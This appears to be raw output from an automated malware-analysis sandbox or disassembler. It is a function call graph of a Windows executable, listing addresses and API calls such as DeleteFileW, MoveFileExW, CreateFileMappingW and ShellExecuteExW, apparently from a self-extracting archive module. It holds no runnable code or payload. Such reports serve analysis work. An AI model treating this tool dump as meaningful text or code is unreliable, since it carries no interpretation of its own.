ba6d5b 77 API calls 24069->24105 24071->24068 24072 ba9ed4 GetLastError 24071->24072 24072->24068 24073 ba9ede 24072->24073 24073->24068 24106 ba6d5b 77 API calls 24073->24106 24076 ba95be 24075->24076 24081 ba95cf 24075->24081 24077 ba95ca 24076->24077 24078 ba95d1 24076->24078 24076->24081 24107 ba974e 24077->24107 24112 ba9620 24078->24112 24081->24039 24083 ba9bdc 24082->24083 24084 ba9be3 24082->24084 24083->24016 24084->24083 24086 ba9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24084->24086 24127 ba6d1a 77 API calls 24084->24127 24086->24084 24087->24016 24088->24013 24089->24036 24090->24036 24091->24036 24092->24036 24093->24036 24094->24036 24095->24023 24096->24027 24097->24024 24099 babb10 _wcslen 24098->24099 24100 babbb8 GetCurrentDirectoryW 24099->24100 24101 babb39 _wcslen 24099->24101 24100->24101 24101->24046 24102->24056 24103->24060 24104->24065 24105->24067 24106->24068 24108 ba9781 24107->24108 24109 ba9757 24107->24109 24108->24081 24109->24108 24118 baa1e0 24109->24118 24113 ba964a 24112->24113 24114 ba962c 24112->24114 24115 ba9669 24113->24115 24126 ba6bd5 76 API calls 24113->24126 24114->24113 24116 ba9638 FindCloseChangeNotification 24114->24116 24115->24081 24116->24113 24119 bbec50 24118->24119 24120 baa1ed DeleteFileW 24119->24120 24121 ba977f 24120->24121 24122 baa200 24120->24122 24121->24081 24123 babb03 GetCurrentDirectoryW 24122->24123 24124 baa214 24123->24124 24124->24121 24125 baa218 DeleteFileW 24124->24125 24125->24121 24126->24115 24127->24084 24129 bbeb3d ___std_exception_copy 24128->24129 24130 bb90d6 24129->24130 24132 bbeb59 24129->24132 24137 bc7a5e 7 API calls 2 library calls 24129->24137 24130->23574 24136 bbf5c9 24132->24136 24138 bc238d RaiseException 24132->24138 24134 bbf5e6 24139 bc238d RaiseException 24136->24139 24137->24129 24138->24136 24139->24134 24141 bb1fea _wcslen 24140->24141 24142 bb201d CompareStringW 24141->24142 24142->23845 24143->23847 24145 bc7ce1 _unexpected 24144->24145 24146 bc7ce8 24145->24146 24147 bc7cfa 24145->24147 24180 bc7e2f GetModuleHandleW 24146->24180 24168 bcac31 EnterCriticalSection 24147->24168 24150 bc7ced 24150->24147 24181 bc7e73 GetModuleHandleExW 24150->24181 24155 bc7d01 24165 bc7d9f 24155->24165 24167 bc7d76 24155->24167 24189 bc87e0 20 API calls _abort 24155->24189 24156 bc7dbc 24172 bc7dee 24156->24172 24157 bc7de8 24190 bd2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24157->24190 24159 bc8a91 _abort 5 API calls 24164 bc7d8e 24159->24164 24160 bc8a91 _abort 5 API calls 24160->24165 24164->24160 24169 bc7ddf 24165->24169 24167->24159 24167->24164 24168->24155 24191 bcac81 LeaveCriticalSection 24169->24191 24171 bc7db8 24171->24156 24171->24157 24192 bcb076 24172->24192 24175 bc7e1c 24178 bc7e73 _abort 8 API calls 24175->24178 24176 bc7dfc GetPEB 24176->24175 24177 bc7e0c GetCurrentProcess TerminateProcess 24176->24177 24177->24175 24179 bc7e24 ExitProcess 24178->24179 24180->24150 24182 bc7e9d GetProcAddress 24181->24182 24183 bc7ec0 24181->24183 24187 bc7eb2 24182->24187 24184 bc7ecf 24183->24184 24185 bc7ec6 FreeLibrary 24183->24185 24186 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24184->24186 24185->24184 24188 bc7cf9 24186->24188 24187->24183 24188->24147 24189->24167 24191->24171 24193 bcb09b 24192->24193 24197 bcb091 24192->24197 24194 bcac98 _unexpected 5 API calls 24193->24194 24194->24197 24195 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24196 bc7df8 24195->24196 24196->24175 24196->24176 24197->24195 24198 bbe5b1 24199 bbe578 24198->24199 24199->24198 24201 bbe85d 24199->24201 24227 bbe5bb 24201->24227 24203 bbe86d 24204 bbe8ca 24203->24204 24215 bbe8ee 24203->24215 24205 bbe7fb DloadReleaseSectionWriteAccess 6 API calls 24204->24205 24206 bbe8d5 RaiseException 24205->24206 24207 bbeac3 24206->24207 24207->24199 24208 bbe966 LoadLibraryExA 24209 bbe979 GetLastError 24208->24209 24210 bbe9c7 24208->24210 24211 bbe98c 24209->24211 24212 bbe9a2 24209->24212 24213 bbe9d9 24210->24213 24216 bbe9d2 FreeLibrary 24210->24216 24211->24210 24211->24212 24217 bbe7fb DloadReleaseSectionWriteAccess 6 API calls 24212->24217 24214 bbea37 GetProcAddress 24213->24214 24222 bbea95 24213->24222 24218 bbea47 GetLastError 24214->24218 24214->24222 24215->24208 24215->24210 24215->24213 24215->24222 24216->24213 24219 bbe9ad RaiseException 24217->24219 24226 bbea5a 24218->24226 24219->24207 24221 bbe7fb DloadReleaseSectionWriteAccess 6 API calls 24223 bbea7b RaiseException 24221->24223 24236 bbe7fb 24222->24236 24224 bbe5bb ___delayLoadHelper2@8 6 API calls 24223->24224 24225 bbea92 24224->24225 24225->24222 24226->24221 24226->24222 24228 bbe5ed 24227->24228 24229 bbe5c7 24227->24229 24228->24203 24244 bbe664 24229->24244 24231 bbe5cc 24232 bbe5e8 24231->24232 24247 bbe78d 24231->24247 24252 bbe5ee GetModuleHandleW GetProcAddress GetProcAddress 24232->24252 24235 bbe836 24235->24203 24237 bbe82f 24236->24237 24238 bbe80d 24236->24238 24237->24207 24239 bbe664 DloadReleaseSectionWriteAccess 3 API calls 24238->24239 24240 bbe812 24239->24240 24241 bbe82a 24240->24241 24242 bbe78d DloadProtectSection 3 API calls 24240->24242 24255 bbe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24241->24255 24242->24241 24253 bbe5ee GetModuleHandleW GetProcAddress GetProcAddress 24244->24253 24246 bbe669 24246->24231 24249 bbe7a2 DloadProtectSection 24247->24249 24248 bbe7dd VirtualProtect 24250 bbe7a8 24248->24250 24249->24248 24249->24250 24254 bbe6a3 VirtualQuery GetSystemInfo 24249->24254 24250->24232 24252->24235 24253->24246 24254->24248 24255->24237 25550 bbb1b0 GetDlgItem KiUserCallbackDispatcher ShowWindow SendMessageW 25552 ba6faa 111 API calls 3 library calls 25501 bbdca1 DialogBoxParamW 25554 bbf3a0 27 API calls 25504 bca4a0 71 API calls _free 25555 bbeda7 48 API calls _unexpected 25505 bd08a0 IsProcessorFeaturePresent 25507 bbc793 98 API calls 4 library calls 25557 bbb18d 78 API calls 25559 bb9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24410 bbce87 24411 bbce90 GetTempPathW 24410->24411 24422 bbc793 _wcslen _wcsrchr 24410->24422 24416 bbceb0 24411->24416 24413 bbd40a 24414 ba4092 _swprintf 51 API calls 24414->24416 24416->24414 24417 bbcee7 SetDlgItemTextW 24416->24417 24441 baa231 24416->24441 24421 bbcf04 24417->24421 24417->24422 24419 bbca67 SetWindowTextW 24419->24422 24421->24422 24424 bbcfea EndDialog 24421->24424 24422->24413 24422->24419 24427 bbc855 SetFileAttributesW 24422->24427 24439 bbc86f _abort _wcslen 24422->24439 24444 bb1fbb CompareStringW 24422->24444 24445 bba64d GetCurrentDirectoryW 24422->24445 24447 baa5d1 6 API calls 24422->24447 24448 baa55a FindClose 24422->24448 24449 bbb48e 76 API calls 2 library calls 24422->24449 24450 bc3e3e 24422->24450 24463 bbb314 ExpandEnvironmentStringsW 24422->24463 24424->24422 24429 bbc90f GetFileAttributesW 24427->24429 24427->24439 24429->24422 24431 bbc921 DeleteFileW 24429->24431 24431->24422 24433 bbc932 24431->24433 24432 bbcc31 GetDlgItem SetWindowTextW SendMessageW 24432->24439 24434 ba4092 _swprintf 51 API calls 24433->24434 24436 bbc952 GetFileAttributesW 24434->24436 24435 bbcc71 SendMessageW 24435->24422 24436->24433 24437 bbc967 MoveFileW 24436->24437 24437->24422 24438 bbc97f MoveFileExW 24437->24438 24438->24422 24439->24422 24439->24432 24439->24435 24440 bbc8eb SHFileOperationW 24439->24440 24446 bab991 51 API calls 2 library calls 24439->24446 24440->24429 24464 baa243 24441->24464 24444->24422 24445->24422 24446->24439 24447->24422 24448->24422 24449->24422 24451 bc8e54 24450->24451 24452 bc8e6c 24451->24452 24453 bc8e61 24451->24453 24455 bc8e74 24452->24455 24461 bc8e7d _unexpected 24452->24461 24454 bc8e06 __vswprintf_c_l 21 API calls 24453->24454 24460 bc8e69 24454->24460 24458 bc8dcc _free 20 API calls 24455->24458 24456 bc8ea7 HeapReAlloc 24456->24460 24456->24461 24457 bc8e82 24472 bc91a8 20 API calls __dosmaperr 24457->24472 24458->24460 24460->24422 24461->24456 24461->24457 24473 bc7a5e 7 API calls 2 library calls 24461->24473 24463->24422 24465 bbec50 24464->24465 24466 baa250 GetFileAttributesW 24465->24466 24467 baa23a 24466->24467 24468 baa261 24466->24468 24467->24416 24469 babb03 GetCurrentDirectoryW 24468->24469 24470 baa275 24469->24470 24470->24467 24471 baa279 GetFileAttributesW 24470->24471 24471->24467 24472->24460 24473->24461 25509 bc2cfb 38 API calls 4 library calls 25510 ba5ef0 82 API calls 25561 ba95f0 80 API calls 25562 bbfd4f 9 API calls 2 library calls 24489 bc98f0 24497 bcadaf 24489->24497 24492 bc9904 24494 bc990c 24495 bc9919 24494->24495 24505 bc9920 11 API calls 24494->24505 24498 bcac98 _unexpected 5 API calls 24497->24498 24499 bcadd6 24498->24499 24500 bcadee TlsAlloc 24499->24500 24501 bcaddf 24499->24501 24500->24501 24502 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24501->24502 24503 bc98fa 24502->24503 24503->24492 24504 bc9869 20 API calls 2 library calls 24503->24504 24504->24494 24505->24492 24506 bcabf0 24507 bcabfb 24506->24507 24508 bcaf0a 11 API calls 24507->24508 24509 bcac24 24507->24509 24510 bcac20 24507->24510 24508->24507 24512 bcac50 DeleteCriticalSection 24509->24512 24512->24510 25511 bc88f0 7 API calls ___scrt_uninitialize_crt 25564 baf1e8 FreeLibrary 24531 bbb7e0 24532 bbb7ea __EH_prolog 24531->24532 24701 ba1316 24532->24701 24535 bbb82a 24538 bbb89b 24535->24538 24539 bbb838 24535->24539 24612 bbb841 24535->24612 24536 bbbf0f 24767 bbd69e 24536->24767 24545 bbb92e GetDlgItemTextW 24538->24545 24546 bbb8b1 24538->24546 24541 bbb878 24539->24541 24542 bbb83c 24539->24542 24553 bbb95f EndDialog 24541->24553 24541->24612 24551 bae617 53 API calls 24542->24551 24542->24612 24543 bbbf2a SendMessageW 24544 bbbf38 24543->24544 24547 bbbf52 GetDlgItem SendMessageW 24544->24547 24548 bbbf41 SendDlgItemMessageW 24544->24548 24545->24541 24549 bbb96b 24545->24549 24550 bae617 53 API calls 24546->24550 24785 bba64d GetCurrentDirectoryW 24547->24785 24548->24547 24554 bbb980 GetDlgItem 24549->24554 24699 bbb974 24549->24699 24557 bbb8ce SetDlgItemTextW 24550->24557 24558 bbb85b 24551->24558 24553->24612 24555 bbb9b7 SetFocus 24554->24555 24556 bbb994 SendMessageW SendMessageW 24554->24556 24560 bbb9c7 24555->24560 24574 bbb9e0 24555->24574 24556->24555 24561 bbb8d9 24557->24561 24805 ba124f SHGetMalloc 24558->24805 24559 bbbf82 GetDlgItem 24563 bbbf9f 24559->24563 24564 bbbfa5 SetWindowTextW 24559->24564 24565 bae617 53 API calls 24560->24565 24568 bbb8e6 GetMessageW 24561->24568 24561->24612 24563->24564 24786 bbabab GetClassNameW 24564->24786 24569 bbb9d1 24565->24569 24566 bbbe55 24570 bae617 53 API calls 24566->24570 24572 bbb8fd IsDialogMessageW 24568->24572 24568->24612 24806 bbd4d4 24569->24806 24575 bbbe65 SetDlgItemTextW 24570->24575 24572->24561 24578 bbb90c TranslateMessage DispatchMessageW 24572->24578 24581 bae617 53 API calls 24574->24581 24579 bbbe79 24575->24579 24576 bbc1fc SetDlgItemTextW 24576->24612 24578->24561 24584 bae617 53 API calls 24579->24584 24583 bbba17 24581->24583 24582 bbbff0 24586 bbc020 24582->24586 24591 bae617 53 API calls 24582->24591 24589 ba4092 _swprintf 51 API calls 24583->24589 24618 bbbe9c _wcslen 24584->24618 24585 bbc73f 98 API calls 24585->24582 24597 bbc73f 98 API calls 24586->24597 24654 bbc0d8 24586->24654 24587 bbb9d9 24711 baa0b1 24587->24711 24590 bbba29 24589->24590 24593 bbd4d4 16 API calls 24590->24593 24594 bbc003 SetDlgItemTextW 24591->24594 24593->24587 24602 bae617 53 API calls 24594->24602 24595 bbba73 24717 bbac04 SetCurrentDirectoryW 24595->24717 24596 bbba68 GetLastError 24596->24595 24604 bbc03b 24597->24604 24598 bbc18b 24599 bbc19d 24598->24599 24600 bbc194 EnableWindow 24598->24600 24605 bbc1ba 24599->24605 24824 ba12d3 GetDlgItem KiUserCallbackDispatcher 24599->24824 24600->24599 24601 bbbeed 24607 bae617 53 API calls 24601->24607 24606 bbc017 SetDlgItemTextW 24602->24606 24615 bbc04d 24604->24615 24639 bbc072 24604->24639 24611 bbc1e1 24605->24611 24623 bbc1d9 SendMessageW 24605->24623 24606->24586 24607->24612 24608 bbba87 24613 bbba9e 24608->24613 24614 bbba90 GetLastError 24608->24614 24609 bbc0cb 24619 bbc73f 98 API calls 24609->24619 24611->24612 24624 bae617 53 API calls 24611->24624 24616 bbbb11 24613->24616 24625 bbbb20 24613->24625 24626 bbbaae GetTickCount 24613->24626 24614->24613 24822 bb9ed5 32 API calls 24615->24822 24616->24625 24628 bbbd56 24616->24628 24617 bbc1b0 24825 ba12d3 GetDlgItem KiUserCallbackDispatcher 24617->24825 24618->24601 24627 bae617 53 API calls 24618->24627 24619->24654 24621 bbc066 24621->24639 24623->24611 24633 bbb862 24624->24633 24629 bbbcfb 24625->24629 24630 bbbb39 GetModuleFileNameW 24625->24630 24631 bbbcf1 24625->24631 24634 ba4092 _swprintf 51 API calls 24626->24634 24635 bbbed0 24627->24635 24726 ba12f1 GetDlgItem ShowWindow 24628->24726 24638 bae617 53 API calls 24629->24638 24816 baf28c 82 API calls 24630->24816 24631->24541 24631->24629 24633->24576 24633->24612 24641 bbbac7 24634->24641 24642 ba4092 _swprintf 51 API calls 24635->24642 24636 bbc169 24823 bb9ed5 32 API calls 24636->24823 24646 bbbd05 24638->24646 24639->24609 24647 bbc73f 98 API calls 24639->24647 24640 bbbd66 24727 ba12f1 GetDlgItem ShowWindow 24640->24727 24718 ba966e 24641->24718 24642->24601 24644 bbc188 24644->24598 24645 bbbb5f 24650 ba4092 _swprintf 51 API calls 24645->24650 24651 ba4092 _swprintf 51 API calls 24646->24651 24652 bbc0a0 24647->24652 24649 bae617 53 API calls 24649->24654 24655 bbbb81 CreateFileMappingW 24650->24655 24656 bbbd23 24651->24656 24652->24609 24657 bbc0a9 DialogBoxParamW 24652->24657 24653 bbbd70 24658 bae617 53 API calls 24653->24658 24654->24598 24654->24636 24654->24649 24660 bbbbe3 GetCommandLineW 24655->24660 24695 bbbc60 __InternalCxxFrameHandler 24655->24695 24668 bae617 53 API calls 24656->24668 24657->24541 24657->24609 24661 bbbd7a SetDlgItemTextW 24658->24661 24663 bbbbf4 24660->24663 24728 ba12f1 GetDlgItem ShowWindow 24661->24728 24662 bbbaed 24666 bbbaff 24662->24666 24667 bbbaf4 GetLastError 24662->24667 24817 bbb425 SHGetMalloc 24663->24817 24665 bbbc6b ShellExecuteExW 24680 bbbc88 24665->24680 24671 ba959a 80 API calls 24666->24671 24667->24666 24672 bbbd3d 24668->24672 24670 bbbd8c SetDlgItemTextW GetDlgItem 24674 bbbda9 GetWindowLongW SetWindowLongW 24670->24674 24675 bbbdc1 24670->24675 24671->24616 24673 bbbc10 24818 bbb425 SHGetMalloc 24673->24818 24674->24675 24729 bbc73f 24675->24729 24678 bbbc1c 24819 bbb425 SHGetMalloc 24678->24819 24683 bbbc9d WaitForInputIdle 24680->24683 24684 bbbccb 24680->24684 24682 bbc73f 98 API calls 24686 bbbddd 24682->24686 24687 bbbcb2 24683->24687 24684->24631 24688 bbbce1 UnmapViewOfFile CloseHandle 24684->24688 24685 bbbc28 24820 baf3fa 82 API calls 2 library calls 24685->24820 24755 bbda52 24686->24755 24687->24684 24691 bbbcb7 Sleep 24687->24691 24688->24631 24691->24684 24691->24687 24692 bbbc3f MapViewOfFile 24692->24695 24694 bbc73f 98 API calls 24698 bbbe03 24694->24698 24695->24665 24696 bbbe2c 24821 ba12d3 GetDlgItem KiUserCallbackDispatcher 24696->24821 24698->24696 24700 bbc73f 98 API calls 24698->24700 24699->24541 24699->24566 24700->24696 24702 ba1378 24701->24702 24703 ba131f 24701->24703 24827 bae2c1 GetWindowLongW SetWindowLongW 24702->24827 24704 ba1385 24703->24704 24826 bae2e8 62 API calls 2 library calls 24703->24826 24704->24535 24704->24536 24704->24612 24707 ba1341 24707->24704 24708 ba1354 GetDlgItem 24707->24708 24708->24704 24709 ba1364 24708->24709 24709->24704 24710 ba136a SetWindowTextW 24709->24710 24710->24704 24714 baa0bb 24711->24714 24712 baa14c 24713 baa2b2 8 API calls 24712->24713 24715 baa175 24712->24715 24713->24715 24714->24712 24714->24715 24828 baa2b2 24714->24828 24715->24595 24715->24596 24717->24608 24719 ba9678 24718->24719 24720 ba96d5 CreateFileW 24719->24720 24721 ba96c9 24719->24721 24720->24721 24722 ba971f 24721->24722 24723 babb03 GetCurrentDirectoryW 24721->24723 24722->24662 24724 ba9704 24723->24724 24724->24722 24725 ba9708 CreateFileW 24724->24725 24725->24722 24726->24640 24727->24653 24728->24670 24730 bbc749 __EH_prolog 24729->24730 24731 bbbdcf 24730->24731 24849 bbb314 ExpandEnvironmentStringsW 24730->24849 24731->24682 24733 bbc780 _wcslen _wcsrchr 24733->24731 24736 bbca67 SetWindowTextW 24733->24736 24739 bc3e3e 22 API calls 24733->24739 24741 bbc855 SetFileAttributesW 24733->24741 24753 bbc86f _abort _wcslen 24733->24753 24850 bb1fbb CompareStringW 24733->24850 24851 bba64d GetCurrentDirectoryW 24733->24851 24853 baa5d1 6 API calls 24733->24853 24854 baa55a FindClose 24733->24854 24855 bbb48e 76 API calls 2 library calls 24733->24855 24856 bbb314 ExpandEnvironmentStringsW 24733->24856 24736->24733 24739->24733 24743 bbc90f GetFileAttributesW 24741->24743 24741->24753 24743->24733 24745 bbc921 DeleteFileW 24743->24745 24745->24733 24747 bbc932 24745->24747 24746 bbcc31 GetDlgItem SetWindowTextW SendMessageW 24746->24753 24748 ba4092 _swprintf 51 API calls 24747->24748 24750 bbc952 GetFileAttributesW 24748->24750 24749 bbcc71 SendMessageW 24749->24733 24750->24747 24751 bbc967 MoveFileW 24750->24751 24751->24733 24752 bbc97f MoveFileExW 24751->24752 24752->24733 24753->24733 24753->24746 24753->24749 24754 bbc8eb SHFileOperationW 24753->24754 24852 bab991 51 API calls 2 library calls 24753->24852 24754->24743 24756 bbda5c __EH_prolog 24755->24756 24857 bb0659 24756->24857 24758 bbda8d 24861 ba5b3d 24758->24861 24760 bbdaab 24865 ba7b0d 24760->24865 24764 bbdafe 24881 ba7b9e 24764->24881 24766 bbbdee 24766->24694 24768 bbd6a8 24767->24768 24769 bba5c6 4 API calls 24768->24769 24770 bbd6ad 24769->24770 24771 bbbf15 24770->24771 24772 bbd6b5 GetWindow 24770->24772 24771->24543 24771->24544 24772->24771 24775 bbd6d5 24772->24775 24773 bbd6e2 GetClassNameW 25375 bb1fbb CompareStringW 24773->25375 24775->24771 24775->24773 24776 bbd76a GetWindow 24775->24776 24777 bbd706 GetWindowLongW 24775->24777 24776->24771 24776->24775 24777->24776 24778 bbd716 SendMessageW 24777->24778 24778->24776 24779 bbd72c GetObjectW 24778->24779 25376 bba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24779->25376 24781 bbd743 25377 bba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24781->25377 25378 bba80c 8 API calls 24781->25378 24784 bbd754 SendMessageW DeleteObject 24784->24776 24785->24559 24787 bbabcc 24786->24787 24789 bbabf1 24786->24789 25379 bb1fbb CompareStringW 24787->25379 24792 bbb093 24789->24792 24790 bbabdf 24790->24789 24791 bbabe3 FindWindowExW 24790->24791 24791->24789 24793 bbb09d __EH_prolog 24792->24793 24794 ba13dc 84 API calls 24793->24794 24795 bbb0bf 24794->24795 25380 ba1fdc 24795->25380 24798 bbb0eb 24801 ba19af 129 API calls 24798->24801 24799 bbb0d9 24800 ba1692 86 API calls 24799->24800 24802 bbb0e4 24800->24802 24804 bbb10d __InternalCxxFrameHandler ___std_exception_copy 24801->24804 24802->24582 24802->24585 24803 ba1692 86 API calls 24803->24802 24804->24803 24805->24633 25388 bbb568 PeekMessageW 24806->25388 24809 bbd502 24813 bbd50d ShowWindow SendMessageW SendMessageW 24809->24813 24810 bbd536 SendMessageW SendMessageW 24811 bbd572 24810->24811 24812 bbd591 SendMessageW SendMessageW SendMessageW 24810->24812 24811->24812 24814 bbd5e7 SendMessageW 24812->24814 24815 bbd5c4 SendMessageW 24812->24815 24813->24810 24814->24587 24815->24814 24816->24645 24817->24673 24818->24678 24819->24685 24820->24692 24821->24699 24822->24621 24823->24644 24824->24617 24825->24605 24826->24707 24827->24704 24829 baa2bf 24828->24829 24830 baa2e3 24829->24830 24831 baa2d6 CreateDirectoryW 24829->24831 24832 baa231 3 API calls 24830->24832 24831->24830 24833 baa316 24831->24833 24834 baa2e9 24832->24834 24835 baa325 24833->24835 24841 baa4ed 24833->24841 24836 baa329 GetLastError 24834->24836 24838 babb03 GetCurrentDirectoryW 24834->24838 24835->24714 24836->24835 24839 baa2ff 24838->24839 24839->24836 24840 baa303 CreateDirectoryW 24839->24840 24840->24833 24840->24836 24842 bbec50 24841->24842 24843 baa4fa SetFileAttributesW 24842->24843 24844 baa53d 24843->24844 24845 baa510 24843->24845 24844->24835 24846 babb03 GetCurrentDirectoryW 24845->24846 24847 baa524 24846->24847 24847->24844 24848 baa528 SetFileAttributesW 24847->24848 24848->24844 24849->24733 24850->24733 24851->24733 24852->24753 24853->24733 24854->24733 24855->24733 24856->24733 24858 bb0666 _wcslen 24857->24858 24885 ba17e9 24858->24885 24860 bb067e 24860->24758 24862 bb0659 _wcslen 24861->24862 24863 ba17e9 78 API calls 24862->24863 24864 bb067e 24863->24864 24864->24760 24866 ba7b17 __EH_prolog 24865->24866 24902 bace40 24866->24902 24868 ba7b32 24869 bbeb38 8 API calls 24868->24869 24870 ba7b5c 24869->24870 24908 bb4a76 24870->24908 24873 ba7c7d 24874 ba7c87 24873->24874 24876 ba7cf1 24874->24876 24937 baa56d 24874->24937 24878 ba7d50 24876->24878 24915 ba8284 24876->24915 24877 ba7d92 24877->24764 24878->24877 24943 ba138b 74 API calls 24878->24943 24882 ba7bac 24881->24882 24884 ba7bb3 24881->24884 24883 bb2297 86 API calls 24882->24883 24883->24884 24886 ba17ff 24885->24886 24887 ba185a __InternalCxxFrameHandler 24885->24887 24888 ba1828 24886->24888 24898 ba6c36 76 API calls __vswprintf_c_l 24886->24898 24887->24860 24890 ba1887 24888->24890 24895 ba1847 ___std_exception_copy 24888->24895 24892 bc3e3e 22 API calls 24890->24892 24891 ba181e 24899 ba6ca7 75 API calls 24891->24899 24894 ba188e 24892->24894 24894->24887 24901 ba6ca7 75 API calls 24894->24901 24895->24887 24900 ba6ca7 75 API calls 24895->24900 24898->24891 24899->24888 24900->24887 24901->24887 24903 bace4a __EH_prolog 24902->24903 24904 bbeb38 8 API calls 24903->24904 24905 bace8d 24904->24905 24906 bbeb38 8 API calls 24905->24906 24907 baceb1 24906->24907 24907->24868 24909 bb4a80 __EH_prolog 24908->24909 24910 bbeb38 8 API calls 24909->24910 24911 bb4a9c 24910->24911 24912 ba7b8b 24911->24912 24914 bb0e46 80 API calls 24911->24914 24912->24873 24914->24912 24916 ba828e __EH_prolog 24915->24916 24944 ba13dc 24916->24944 24918 ba82aa 24919 ba82bb 24918->24919 25087 ba9f42 24918->25087 24922 ba82f2 24919->24922 24952 ba1a04 24919->24952 25083 ba1692 24922->25083 24925 ba82ee 24925->24922 24933 baa56d 7 API calls 24925->24933 24935 ba8389 24925->24935 25091 bac0c5 CompareStringW _wcslen 24925->25091 24928 ba83e8 24979 ba1f6d 24928->24979 24933->24925 24971 ba8430 24935->24971 24936 ba83f3 24936->24922 24983 ba3b2d 24936->24983 24995 ba848e 24936->24995 24938 baa582 24937->24938 24939 baa5b0 24938->24939 25364 baa69b 24938->25364 24939->24874 24941 baa592 24941->24939 24942 baa597 FindClose 24941->24942 24942->24939 24943->24877 24945 ba13e1 __EH_prolog 24944->24945 24946 bace40 8 API calls 24945->24946 24947 ba1419 24946->24947 24948 bbeb38 8 API calls 24947->24948 24951 ba1474 _abort 24947->24951 24949 ba1461 24948->24949 24949->24951 25092 bab505 24949->25092 24951->24918 24953 ba1a0e __EH_prolog 24952->24953 24965 ba1a61 24953->24965 24967 ba1b9b 24953->24967 25108 ba13ba 24953->25108 24955 ba1bc7 25111 ba138b 74 API calls 24955->25111 24958 ba3b2d 102 API calls 24962 ba1c12 24958->24962 24959 ba1bd4 24959->24958 24959->24967 24960 ba1c5a 24964 ba1c8d 24960->24964 24960->24967 25112 ba138b 74 API calls 24960->25112 24962->24960 24963 ba3b2d 102 API calls 24962->24963 24963->24962 24964->24967 24969 ba9e80 79 API calls 24964->24969 24965->24955 24965->24959 24965->24967 24966 ba3b2d 102 API calls 24968 ba1cde 24966->24968 24967->24925 24968->24966 24968->24967 24969->24968 24970 ba9e80 79 API calls 24970->24965 25130 bacf3d 24971->25130 24973 ba8440 25134 bb13d2 GetSystemTime SystemTimeToFileTime 24973->25134 24975 ba83a3 24975->24928 24976 bb1b66 24975->24976 25135 bbde6b 24976->25135 24980 ba1f72 __EH_prolog 24979->24980 24982 ba1fa6 24980->24982 25143 ba19af 24980->25143 24982->24936 24984 ba3b39 24983->24984 24985 ba3b3d 24983->24985 24984->24936 24994 ba9e80 79 API calls 24985->24994 24986 ba3b4f 24987 ba3b6a 24986->24987 24988 ba3b78 24986->24988 24989 ba3baa 24987->24989 25298 ba32f7 90 API calls 2 library calls 24987->25298 25299 ba286b 102 API calls 3 library calls 24988->25299 24989->24936 24992 ba3b76 24992->24989 25300 ba20d7 74 API calls 24992->25300 24994->24986 24996 ba8498 __EH_prolog 24995->24996 24999 ba84d5 24996->24999 25006 ba8513 24996->25006 25325 bb8c8d 104 API calls 24996->25325 24997 ba84f5 25000 ba84fa 24997->25000 25001 ba851c 24997->25001 24999->24997 25002 ba857a 24999->25002 24999->25006 25000->25006 25326 ba7a0d 153 API calls 25000->25326 25001->25006 25327 bb8c8d 104 API calls 25001->25327 25002->25006 25301 ba5d1a 25002->25301 25006->24936 25007 ba8605 25007->25006 25307 ba8167 25007->25307 25010 ba8797 25011 baa56d 7 API calls 25010->25011 25013 ba8802 25010->25013 25011->25013 25012 bad051 82 API calls 25020 ba885d 25012->25020 25313 ba7c0d 25013->25313 25015 ba898b 25330 ba2021 74 API calls 25015->25330 25016 ba8a5f 25021 ba8ab6 25016->25021 25033 ba8a6a 25016->25033 25017 ba8992 25017->25016 25022 ba89e1 25017->25022 25020->25006 25020->25012 25020->25015 25020->25017 25328 ba8117 85 API calls 25020->25328 25329 ba2021 74 API calls 25020->25329 25028 ba8a4c 25021->25028 25333 ba7fc0 97 API calls 25021->25333 25023 ba8b14 25022->25023 25025 baa231 3 API calls 25022->25025 25022->25028 25042 ba8b82 25023->25042 25071 ba9105 25023->25071 25334 ba98bc 25023->25334 25024 ba8ab4 25029 ba959a 80 API calls 25024->25029 25030 ba8a19 25025->25030 25027 ba959a 80 API calls 25027->25006 25028->25023 25028->25024 25029->25006 25030->25028 25331 ba92a3 97 API calls 25030->25331 25031 baab1a 8 API calls 25034 ba8bd1 25031->25034 25033->25024 25332 ba7db2 101 API calls 25033->25332 25037 baab1a 8 API calls 25034->25037 25056 ba8be7 25037->25056 25040 ba8b70 25338 ba6e98 77 API calls 25040->25338 25042->25031 25043 ba8cbc 25044 ba8d18 25043->25044 25045 ba8e40 25043->25045 25046 ba8d8a 25044->25046 25047 ba8d28 25044->25047 25048 ba8e52 25045->25048 25049 ba8e66 25045->25049 25068 ba8d49 25045->25068 25054 ba8167 19 API calls 25046->25054 25051 ba8d6e 25047->25051 25059 ba8d37 25047->25059 25052 ba9215 124 API calls 25048->25052 25050 bb3377 75 API calls 25049->25050 25053 ba8e7f 25050->25053 25051->25068 25341 ba77b8 111 API calls 25051->25341 25052->25068 25055 bb3020 124 API calls 25053->25055 25058 ba8dbd 25054->25058 25055->25068 25056->25043 25061 ba981a 79 API calls 25056->25061 25063 ba8c93 25056->25063 25064 ba8de6 25058->25064 25065 ba8df5 25058->25065 25058->25068 25340 ba2021 74 API calls 25059->25340 25061->25063 25063->25043 25339 ba9a3c 82 API calls 25063->25339 25342 ba7542 85 API calls 25064->25342 25343 ba9155 93 API calls __EH_prolog 25065->25343 25075 ba8f85 25068->25075 25344 ba2021 74 API calls 25068->25344 25070 ba9090 25070->25071 25073 baa4ed 3 API calls 25070->25073 25071->25027 25072 ba903e 25320 ba9da2 25072->25320 25074 ba90eb 25073->25074 25074->25071 25345 ba2021 74 API calls 25074->25345 25075->25070 25075->25071 25075->25072 25319 ba9f09 SetEndOfFile 25075->25319 25078 ba9085 25080 ba9620 77 API calls 25078->25080 25080->25070 25081 ba90fb 25346 ba6dcb 76 API calls 25081->25346 25084 ba16a4 25083->25084 25362 bacee1 86 API calls 25084->25362 25088 ba9f59 25087->25088 25089 ba9f63 25088->25089 25363 ba6d0c 78 API calls 25088->25363 25089->24919 25091->24925 25093 bab50f __EH_prolog 25092->25093 25098 baf1d0 82 API calls 